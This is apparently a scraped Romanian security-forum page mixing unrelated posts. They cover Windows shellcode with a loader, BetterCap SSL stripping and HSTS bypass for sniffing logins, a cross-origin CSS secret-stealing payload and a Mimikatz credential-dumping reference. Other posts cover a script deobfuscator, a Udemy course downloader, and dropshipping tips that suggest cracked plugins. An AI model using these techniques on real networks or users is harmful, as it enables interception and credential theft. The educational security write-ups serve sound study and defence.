Leaderboard

Descarcati: https://github.com/nishad/udemy-dl-windows/releases Creati un cont nou pe udemy, nu conteaza ce email folositi pentru ca nu trebuie verificat Deschideti cursul dorit si apasati pe Start Free Preview (apare sub Take This Course) Rulati programul astfel: udemy-dl.exe -u email -p pass <link catre curs> Screenshots pentru cei batuti in cap: Spor la invatat

Windows x86 SwapMouseButton shellcode /* Title: Windows x86 SwapMouseButton shellcode Author: Ionut Popescu Date: December 2015 Tested on: Windows 7/Windows 10 Build/Run: Visual C++ Express Edition Shellcode written for educational purposes. Detailed description: - http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/ - http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/ - http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/ */ /* ; Shellcode details ; ----------------- xor ecx, ecx mov eax, fs:[ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset namestable add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0 Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 0x50746547 ; GetP jnz Get_Function cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword ptr[eax + 0x8], 0x65726464 ; ddre jnz Get_Function mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx mov esi, [edx + 0x1c] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) add esp, 0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 push eax ; EAX = LoadLibrary push ecx mov cx, 0x6c6c ; ll push ecx push 0x642e3233 ; 32.d push 0x72657375 ; user push esp ; "user32.dll" call eax ; LoadLibrary("user32.dll") add esp, 0x10 ; Clean stack mov edx, [esp + 0x4] ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ecx mov ecx, 0x616E6F74 ; tona push ecx sub dword ptr[esp + 0x3], 0x61 ; Remove "a" push 0x74754265 ; eBut push 0x73756F4D ; Mous push 0x70617753 ; Swap push esp ; "SwapMouseButton" push eax ; user32.dll address call edx ; GetProc(SwapMouseButton) add esp, 0x14 ; Cleanup stack xor ecx, ecx ; ECX = 0 inc ecx ; true push ecx ; 1 call eax ; Swap! add esp, 0x4 ; Clean stack pop edx ; GetProcAddress pop ebx ; kernel32.dll base address mov ecx, 0x61737365 ; essa push ecx sub dword ptr [esp + 0x3], 0x61 ; Remove "a" push 0x636f7250 ; Proc push 0x74697845 ; Exit push esp push ebx ; kernel32.dll base address call edx ; GetProc(Exec) xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess */ #include "stdafx.h" #include <Windows.h> int main() { char *shellcode = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75" "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68" "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73" "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68" "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9" "\x41" // inc ecx - Remove this to restore the functionality "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61" "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0"; // Set memory as executable DWORD old = 0; BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old); // Call the shellcode __asm { jmp shellcode; } return 0; }

Ne lasi bre cu rahaturile astea? bine ca pui semnatura cu font cat scula calului pentru un link de ref. Sa postezi ceva acatarea nu te duce mintea.

SSL Stripping and HSTS Bypass with BetterCap Since version 1.3.0 BetterCap is able to perform SSL stripping and since version 1.3.8 it also performs HSTS bypass, but what are exactly these techniques and how can we use them? SSL Stripping SSL stripping is a technique introduced by Moxie Marlinspike during BlackHat DC 2009, the website description of this technique goes like: Long story short, this technique will replace every https link in webpages the target is browsing with http ones so, if a page would normally look like: ... <a href="https://www.facebook.com/">Login</a> ... During a SSL stripping attack its HTML code will be modified as: ... <a href="http://www.facebook.com/">Login</a> ... Being the man in the middle, this allow us to sniff and modify pages that normally we wouldn't be able to even see. HSTS Bypass SSL stripping worked quite well until 2010, when the HSTS specification was introduced, Wikipedia says: Moreover HSTS policies have been prebuilt into major browsers meaning that now, even with a SSL stripping attack running, the browser will connect to HTTPS anyway, even if the http:// schema is specified, making the attack itself useless. Picture credits to Scott Helme For this reason, Leonardo Nve Egea presented sslstrip+ ( or sslstrip2 ) during BlackHat Asia 2014. This tool was an improvement over the original Moxie's version, specifically created to bypass HSTS policies. Since HSTS rules most of the time are applied on a per-hostname basis, the trick is to downgrade HTTPS links to HTTP and to prepend some custom sub domain name to them. Every resulting link won't be valid for any DNS server, but since we're MITMing we can resolve these hostnames anyway. Let's take the previous example page: ... <a href="https://www.facebook.com/">Login</a> ... A HSTS bypass attack will change it to something like: ... <a href="http://wwww.facebook.com/">Login</a> ... Notice that https has been downgraded to http and www replaced with wwww ). When the "victim" will click on that link, no HSTS rule will be applied ( since there's no rule for such subdomain we just created ) and the MITM software ( BetterCap in our case ) will take care of the DNS resolution, allowing us to see and alter the traffic we weren't supposed to see. Using BetterCap Using BetterCap to perform such attack is very easy, there's no special command line argument for it since everything ( both SSL stripping and HSTS bypass ) was implemented as builtin features of the transparent proxy, you only need to enable it: sudo bettercap --proxy -P POST The following screenshot was taken during a test run, as you can see Facebook was succesfully SSL-stripped and I was able to sniff login credentials in cleartext. Sursa: https://www.bettercap.org/blog/sslstripping-and-hsts-bypass/#.VsHQflQ9TwA.twitter

Malwarebytes Anti-Ransomware uses advanced proactive technology that monitors what ransomware is doing and stops it cold before it even touches your files. It has no shot at encrypting. And it does not rely on signatures or heuristics, so it’s light and completely compatible with antivirus. These methods proved to be so successful at stopping ransomware that Malwarebytes Anti-Ransomware detected all of the latest and most dangerous ransomware variants right out of development and into beta 1. This means when running Malwarebytes Anti-Ransomware, you do not have to worry about getting infected by CryptoLocker, CryptoWall, or CTBLocker. Better yet, it can defeat new ransomware the moment it is released, proactively protecting you from ransomware that’s never even been seen before. Malwarebytes Anti-Ransomware open beta starts today and is available for anyone to install and try out. Please keep in mind that this is the first beta and there may be some bugs or issues that need to be worked out, so we encourage you to try it out in a non-production environment first. Download Beta https://malwarebytes.box.com/s/uluqe6ms2l36bsxkudurlr7yr8lp6d8g

Salut, Am mai discutat acest subiect, cred ca unele topicuri s-au pierdut din pacate, dar update-ul forumului este de bun augur, articole se pot scrie oricand. Pentru cei care mi-ati scris in ultima vreme aici, pe skype, facebook etc, incerc sa va raspund aici, forumul fiind public, poate ii ajuta si pe altii. Nu o sa reiau ce fac si cum fac, o sa incerc sa raspund la cateva intrebari. 1) Ai nevoie de firma pentru a incepe un business in dropshipping ? Daca vrei sa fie o chestie serioasa, iti recomand sa iti faci una, la inceput nu o sa iti trebuiasca, dar cu timpul o sa tranzactionezi din ce in ce mai multi bani si o sa ai nevoie de o firma, paypalul o sa puna intrebari si o sa devina stresant. 2) De ce cunostinte ai nevoie ? De utilizare a calculatorului si de limba engleza medie. E nevoie intradevar de un magazin online dar se gasesc 100000+ tutoriale nu iti trebuie cunostinte, sau poti folosi shopify ! 3) De unde iau produsele ? De oriunde ! Asta daca nu detii o companie. Daca ai o companie, ceea ce iti si recomand, suplieri se gasesc : sunt marketuri pentru asa ceva, un exemplu este Doba. Daca nu ai firma si totusi cauti un suplier, poti arunca un ochi aici : http://www.blackhatworld.com/blackhat-seo/f68-dropshipping-wholesale-hookups/ 4) Cat timp iti trebuie, eu am si servici..si... Si eu, da si eu am un job, intradevar e mai lejer dar am un program de 8 ore si totusi reusesc cumva sa ma ocup si de droipshipping. Prefer sa am si un job dar sa muncesc si la afacerea mea, pana strang destuii bani sa investesc in ceva mai bun, sau sa extind deja ceea ce am. 5) Am site, am tot planificat dar nu am cui sa vand ! Metoda cu bani + rapida : Dai bani ca sa faci bani ! = Facebook Ads, Google Adwords, campanii SEO. Metoda fara bani : pagini in social media -> distribuirea in toate grupurile din nisa ta + grupurile de tip "Buy & Sell", follow 4 follow, pin, etc...depinde de retea. Seo -> cred ca poti optimiza tu paginile fara ajutorul cuiva, sunt mult prea multe informatii pe internet, apoi poti incepe pasiv sa iti creezi si backlinkuri, semnale sociale, etc. 6) Ce sisteme de plati folosesti ?! Inainte de a avea firma foloseam doar paypal, pentru ca ofera celor care nu au un cont sa plateasca si cu cardul, acum am o firma si am integrate mai toate sistemele : Cu cardul, paypal, western etc. 7) Cat sa cresc pretul produselor ?! Formula mea : PRETUL PRODUSULUI + PRETUL CELUI MAI RAPID SHIPPING + 20 - 40 % - asta depinde si de valoarea produsului. 8) Ce fac daca cineva imi cere date de contact ?! Ai crescut in pestera ? Sau deh poate esti mut, atunci te inteleg, daca nu se aplice acestea, te duci frumos pe skype, iti cumperi un nr de telefon de la ei, il redirectezi catre nr tau de telefon si vorbesti cu oameni. 9) Ce fac daca nu stiu engleza ?! Pas ! 10) Cat profit faci si cat de repede ai inceput sa castigi bani ? Fac destul altfel nu ma tineam de business si nu imi faceam o companie pentru aceste lucruri. Cat de repede? Eu din prima zi pentru ca aveam cateva conturi de social media deja setate pentru aceste lucruri. 11) Poti sa imi dai un link cu siteurile tale si / sau paginile tale ?! NU. Acestea sunt cele mai comune intrebari care le primesc, dropshippingul e in ochii tuturor, nu e secret, toti il puteti face, asta ca sa nu mai spuneti ca nu se pot face bani pe internet! Cum spunea un bun prieten al meu ": Bani adevarati pe internet se fac din intermediere de servicii....ala are produsul, tu il vinzi, punct. Numai Bine si spor la bani !

Salut, Acum 18 zile am creat un topic chiar pe acest forum in care intrebam daca se ocupa careva cu amazon associates (topicul aici) , topic la care nu mi-a raspuns nimeni, tind sa cred ca ori nu sunt oameni care se ocupa cu asa ceva, ori cei care o fac deja nu vor sa dezvaluie tainele amazonului. Am inceput sa ma documentez, sa vad ce si cum, care este regulamentul, de ce am nevoie etc. Pentru ca deja sunt in domeniul dropshippingului pe o anumita nisa, am hotarat ca pe amazon o sa merg tot pe acea nisa, pentru ca aveam deja pagini de social media facute cu oameni care au cumparat, pagini care le-am construit manual si am cladit un anumit nivel de incredere. Cum am precizat si in alte topicuri ale mele, eu vand doar prin intermediul social media, nu am treaba cu motoare de cautare. Ma chinuii de vreo 2 zile sa scriu aceste randuri, acesta nu este un articol , mie imi place sa-i spun motivatie, pentru ca speram ca pentru amazon sa mai gasesc ceva oameni dispusi sa faca bani si sa invete. Pe 1 am facut topicul si pe 2 seara aveam deja site-ul pus la punct cu sistemul de la amazon integrat, automatizat in proportie de 60%. Acestea sunt castigurile mele de pe 2 pana pe 16 a aceste-i luni : Potentialii mei clienti sunt aproximativ 200.000 daca stau sa adun toti care-i am pe social media (facebook, twitter, instagram, pinterest). Acum sa va spun de ce aveti nevoie : - de un domeniu + hosting - Wordpress - plugin-uri de automatizare (woocommerce amazon affiliates, prosociate) - o nisa - de timp sa-ti construiesti cateva pagini de social media pe anumite nise (daca ai un 10-15 dolari cred ca poti cumpara, ieri am achizitionat un cont de instagram cu 66k pe nisa mea cu 25$) sau daca esti tare si ai cunostinte, te bagi pe seo si pe bazezi pe motoarele de cautare. - timp in fiecare zi cam o ora sa mai bagi produse noi (se face automat, tu doar sa le alegi ) Pe scurt ai nevoie de vreo 10-15 dolari sa-ti iei domeniu si hosting ok pentru o luna iar restul resurselor se gasesc gratuite / crackuite de care te poti folosi pana ti le poti cumpara. Ps: Daca careva vrea sa invete mai multe, mie personal acest topic mi-a fost de ajuns. Spor la bani

Intro to ARP spoofing with bettercap I recently discovered a fairly new man-in-the-middle tool called bettercap, which I will test in this video. I will explain the concept of ARP spoofing, install bettercap, and see how one can use it to sniff passwords on a network. Here it is: If you liked it, checkout my other trainings: http://hackademy.aetherlab.net Sursa: http://aetherlab.net/2016/02/intro-to-arp-spoofing-with-bettercap/

Aproape am râs

((void (*)(void))shellcode)(); Defineste un pointer la o functie care nu returneaza nimic, nu are niciun parametru, are adresa "shellcode" si o apeleaza. Dar tot e necesar ca zona respectiva de memorie sa fie marcata ca "RWX" cu VirtualProtect. Exemplu: https://www.exploit-db.com/exploits/38959/

Script Deobfuscator Released Posted on February 15, 2016 by darryl The purpose of this tool is to help you perform static analysis on obfuscated scripts. It’s often easier to dynamically analyze scripts but there are times when you just don’t know where to start or you just want a high-level view of what’s going on with the script. This tool may be able to help you. I already wrote a tool called PHP Script Decoder but this new version has been re-written in .NET with new functionality and flexibility in order to handle PHP, Javascript, VBA, and VBS scripts. To explain how to use this tool, let me show you how to tackle seven different obfuscated scripts. Example #1 (unphp) Here’s what the script looks like. Looking at the script, you’ll see an array of base64-encoded strings at the top. Following that are references to specific elements from the array. Paste in the script sections like so. The script you are trying to deobfuscate is at the top. The array of base64-encoded strings separated by commas in the middle section. I enter the search string value of “_705650624(#)” since that’s how the script at the top references the elements from the array (note: the pound sign is a wildcard and must be present). I select the “Array” method and click on the “Convert” button. The results still show encoded strings so now I check the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options and try again. The script has been deobfuscated and much easier to read. The script won’t execute though because the strings are quoted (or unquoted) incorrectly. Example #2 (ddecode) Here’s the script we’ll be working on: First we need to unescape it so click on the “Unescape” button. If you right-click on the Output box, there’s an option to save the results to a text file. (You can right-click on the Input box and read in a file too.) Click on “Copy Output to Input” to move the result to the top. This script uses randomize variable names and assigns a value to it. The later portion references the value. The tool will parse the script and load each variable and associated value into an array. It then does a search for the variable and replaces it with the value. Choose the “Random Vars 1” method. The delimiter for this script is a semi-colon and for the search string I enter ${“GLOBALS”}[“#”]=”*”; The pound sign is a placeholder for the variable name and the asterisk is the placeholder for the value. Here’s the result: Example #3 (unphp) This script also uses random variable names but in this version, the strings are base64-encoded. The top portion defines the global variables while the lower section, beginning at “session_start()”, references them. Paste the script sections in the tool as follows then choose the “Random Vars 2” method and the “Base64 Decode” and “Keep Quotes” options. Note the search string has spaces in between so that it matches the script at the top. Example #4 (unphp) Here’s what the script looks like (I highlighted the key): This script references an element in an array to build the values for its variables. The elements are based on the character position in the key. The first step is to paste the entire script in the input box and choose the key lookup option. I use $f9[#] as the search string. In the Lookup Key box, paste the key and remove the starting and ending quotes. Also make sure the key you paste in has been properly escaped. You can see there’s concatenation going on so check the “Concatenate” option. Example #5 (ddecode) In this example, we’re just interested in decoding the base64 strings. Copy the entire script to the Input box, choose the “Base64” method as well as the “Base64 Decode”, “Concatenate”, and “Keep Quotes” options. Make sure the delimiter and search string matches that of the script. Example #6 (pastebin) This script is uses the Joomla exploit and contains decimal values making it tough to see immediately what this does. Paste the script into the Input box and choose the “ASCII” method. Almost but it’s not concatenated. If you choose the “Concatenate” option, it won’t clean up everything. In the “Output Options” section, there’s a “Remove Chars” box. Enter a period and try again. Example #7 (pastebin) This last example is a VBA script. It does a simple math calculation then the result is convert to its ASCII character equivalent. Paste the script in and choose the “Math” method. The result shows decimal values but not the text equivalent. So enter “chr(” into the “Pre Str” box and a closing parenthesis in the “Post Str” box. Look familiar? Now we can use the “ASCII” method to get the characters. I also entered an ampersand and space character in the “Remove Chars” box. The resulting deobfuscated script will probably error out if you try executing it. Again, all this tool will do is try to make the script readable so you can better understand it. You may need to use this tool on parts of the script then put them back together yourself to figure things out. I tried to make the functions in this tool flexible and generic enough to handle whatever scripts come your way. However, if you encounter something new, please let me know. You can get the tool here. Happy reversing! Sursa: http://www.kahusecurity.com/2016/script-deobfuscator-released/

Stealing Secrets with CSS : Cross Origin CSS Attacks In this post I'm going to discuss a web attack that was designated CVE-2015-5826 and CVE-2015-1287 which abuses the way CSS parsing works in some browsers and expands the way we think about HTML injection attacks. Introduction CSS Cross Origin attacks work by constructing CSS style-sheets from vulnerable pages and extracting sensitive information from these pages in the form of CSS property attributes. Vulnerable pages include anything page that allows an attacker to inject arbitrary printable unhindered alphanumeric text including braces, brackets and parenthesis; basically any subset of the ASCII table that allows you to construct valid CSS. Attacks with an even more restricted character set may be possible depending on the content of the vulnerable page. Most modern browsers including Firefox, Chrome and Opera have recently included defenses for this attack although to outdated browsers this attack still poses a threat. In order to have an HTML page treated as CSS the browser needs to operate in Quirks Mode, the following section explains what and how this "mode" is. Quirks Mode CSS parsers can be configured to run in a "greedy" or "best effort" mode; in which they ignore anything that isn't CSS syntax and gobble up everything else in an effort to deliver as user friendly and backward compatible experience as possible (if I had a 1 cent for every time a user experience decision caused a security vulnerability...). The idea comes from the days when browsers were far and few between (there was basically Netscape and Microsoft Explorer) and this meant there was little in the way of standardizing web scripting, well there wasn't any need to. The W3C then introduced standards in order to try (as futile as that try was) to civilize the web to some extent, but this meant that if browsers adopted these standards cold turkey there would be tons of web pages written according the old lore that would not work anymore; thus a special operating mode was introduced to accommodate these pages. This "special operating" mode is called Quirks mode and can be triggered by starting off an HTML document with an invalid Document Type Declaration. For some browsers quirks mode introduces behavior more interesting than just ignoring faulty CSS, it affects the way Content-Type headers are interpreted. For instance in quirks mode, if CSS is loaded or referenced in a link or style element the Content-Type header will be ignored and the content returned will be interpreted as CSS! To quote: Stylesheets linked in the document with an advisory mime type of text/css will still be treated as CSS even if the server gives a Content-Type header other than text/css. -- https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior Of course what that means is that any kind of document can then be treated as CSS, which means as an attacker if you can inject a document into a style-sheet reference it gives him/her tremendous freedom! You might even be able to have an inject-able HTML document be treated as CSS itself That last sentence was pretty important, its actually the realization that this post is trying to share with you, if you don't completely get it please re-read it until you do. Besides Quirks Mode ofcourse there's the full on standards compliant mode called Standards mode; this is only engaged when an HTML document is started with a valid DTD. So if an HTML document starts off with a DTD that looks like this : <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> or any other valid DTD it will parse the entire document in Standard Mode. And the following DTDs are examples that will trigger quirks mode most modern browsers: <!DOCTYPE html PUBLIC > <!DOCTYPE html BLAH> <!DOCTYPE> Basically any non-valid DTD. You can check which mode a browser is parsing HTML by inspecting the document.compatMode property via JavaScript; as follows: document.compatMode == "CSS1Compat" ? "Browser is in Standards Mode" : "Browser is in Quirks Mode" Here's some screenshots of that little script in action with some examples of DTDs that trigger the two parsing modes: Browser parsing in Standards mode Browser Parsing in Quirks Mode And here's a summary of how different browsers behave according to my research on the subject: Summary of how browsers respond to some DTDs for HTML *Q - Quirks Mode *S - Standards Mode *Tests were done using Firefox 44.0.2, Opera 35.0, Chrome 48.0 Obviously upon finding out that Quirks Mode will force browsers to ignore content type headers I had to check it out for myself, here's a couple screenshots of me doing that: In the screenshot above we can see Firefox loading up the HTML page shown in the bottom right, which references the CSS shown in the bottom left. I'm using PHP to force my Apache2 web server to return a Content-Type header of text/plain which means its just basic text. And as you can see the browser's console appropriately warns us that some text is trying to be loaded as CSS. Exactly the same situation as the previous screenshot except that the DTD of the HTML page being loaded forces the browser into Quirks Mode and as a result the CSS (being served with a text/plain Mime type) is parsed and applied to the text on the page! The Setup So that is the awesomeness that is Quirks Mode, lets talk about the vulnerability for a second. In this scenario we have a simple page vulnerable to injection. We need to clear a few rules of engagement here though, when I say "vulnerable to injection" I mean the following: only alphanumeric,quotes ",' and braces {}, brackets [] and parenthesis () we can exclude any active content injection from this case as well In this example I'm using the same origin to host the attack page, this is merely for demonstration purposes and because all the browsers I currently have include protections for the attack. So basically you have a page in which you can influence the text content. Where's the page I'm going to use for this demonstration: <?php echo " <!DOCTYPE html asfdasfdadf> <html> <head> <link rel=\"stylesheet\" href=\"incorrectMime.php?type=plain\"> </head> <div id=\"text\"> This text should be red <br> </div> Injection point: ".$_GET["injectme"]." secret goes here'} </html>"; ?> view rawinjectme.php hosted with ❤ by GitHub Obviously there is no hindrance here to a full on XSS attack, you would just need to imagine that there's some hectic WAF blocking anything that could be used to execute XSS. The Attack The Attack works as follows, we want to bypass same origin policy in order to steal the secret embedded on the page. You can think of this secret as a Cross Site Request Forgery (CSRF) token, credit card number, password etc. We are going to do this by forcing our victims browser to use the inject-able page as CSS on a page we control. The attack will extract the information by having the piece of information we are targeting interpreted as an attribute of a CSS property i.e. a font-family name or background image URL value. So in summary the attacker prepares a page that includes the vulnerable page as a style sheet, and extracts the information (usually using JavaScript). Lets see how this works Payload We're going to use the following injection payload: %0A{}.extract{font-family:' this will cause the page to render as follows: <!DOCTYPE html asfdasfdadf> <html> <head> <link rel="stylesheet" href="incorrectMime.php?type=plain"> </head> <div id="text"> This text should be red <br> </div> Injection point: {}extract{font-family:' secret goes here'} </html> view rawinjectme.html hosted with ❤ by GitHub Which means we effectively have a page that when interpreted as CSS will have a font-family name of "secret goes here". It looks good, all we need to do now is host this injected page on a page under our control and extract the CSS property using JavaScript. Extraction In order to get hold of the font-family name we just created we need to host the injected page as a CSS Stylesheet also remembering that we need to force the style sheet to be loaded under Quirks Mode! So pay attention to the DTD of the attack page. Here's the little page I prepared for this example: <!DOCTYPE afdssadfsafdd> <html> <head> <link charset="utf-8" type="text/css" rel="stylesheet" href="injectme.php?injectme=%0A{}extract{font-family:'"> </head> <body> adsfassdf </body> </html> view rawxcs_attack.html hosted with ❤ by GitHub Once its loaded up we can extract any CSS properties by using the following DOM path: document.styleSheets.cssRules[j].cssText Where i,j are the indices needed to reach the desired cssText property. In our case it will be i=j=0. Where's what it looks like when the information has been extracted correctly and loaded up into the DOM for extraction: Secret extracted successfully as a font-family name Boom! Secret extracted game over References and Further Reading Lin-Shung Huang, Lin-Shung Huang, Chris Evans, Collin Jackson; Protecting Browsers from Cross-Origin CSS Attacks https://www.linshunghuang.com/papers/css.pdf [ACM Conference on Computer and Communications Security (CCS) 2010] Wikipedia , Quirks Mode https://en.wikipedia.org/wiki/Quirks_mode [retrieved 2/14/2016] @filedescriptor Cross-Origin CSS Attacks Revisited (feat. UTF-16) http://blog.innerht.ml/cross-origin-css-attacks-revisited-feat-utf-16/ [retrieved 2/14/2016] Mozilla Developer Network, Quirks Mode and Standards Mode https://developer.mozilla.org/en-US/docs/Quirks_Mode_and_Standards_Mode [retrieved 2/14/2016] Mozilla Developer Network, Mozilla Quirks Mode Behavior https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior [retrieved 2/14/2016] CVE-2015-5826 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5826 CVE-2015-1287 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1287 Posted by Keith Makan at 11:00 Sursa: http://blog.k3170makan.com/2016/02/stealing-secrets-with-css-cross-origin.html

Unofficial Guide to Mimikatz & Command Reference Mimikatz Command Reference Version: Mimikatz 2.0 alpha 20151113 (oe.eo) edition [11/13/2015] Page last updated: 1/05/2016 Introduction: It seems like many people on both sides of the fence, Red & Blue, aren’t familiar with most of Mimikatz’s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. This way both Red & Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect. I developed this reference after speaking with a lot of people, hired to both defend, and attack, networks and I learned that outside of a couple of the top 3 used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required & optional), as well as screenshots and additional context (where possible). There are several I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible. This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don’t own or have been allowed/approved to. In other words, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”. This page and all content contained within is not to be reproduced in whole or part without express written consent by this page’s author. I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from using Mimikatz, reading the source code, conversations with Benjamin, his blog & GitHub pages, and my own work/research. Any errors on this page are my own only. Send comments/kudus here. Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially Windows 10. Mimikatz Overview: Mimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). The Mimikatz.exe contains, or at least should contain, all capability noted there. Mimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz executable, leveraging the MetaSploit script, the official Invoke-Mimikatz PowerShell version, or one of the dozen of Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is awesome!). The Mimikatz source code and release binaries are available on GitHub and is licensed under Creative Commons with the following detail: You are free to: * Share — copy and redistribute the material in any medium or format * Adapt — remix, transform, and build upon the material * for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits. Mimikatz Author(s): Benjamin DELPY gentilkiwi, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) DCSync function in lsadump module was co-written with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website (http://www.mysmartlogon.com ) “Official” Mimikatz Links: Mimikatz GitHub Location (Source Code) Mimikatz Releases (includes binaries) Mimikatz GitHub Wiki (Documentation, some of which is reproduced here) GentilKiwi Blog (much of it is in French, use Chrome/other for translation) Mimikatz & Credentials: After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory. This functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled): HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD) This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem. Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This include running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (it uses Microsoft’s Domain Controller official replication APIs, once the correct rights are attained). Available Credentials by OS: Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory. (Click image to embiggen) PowerShell & Mimikatz: The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script (written byJoseph Bialek) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in 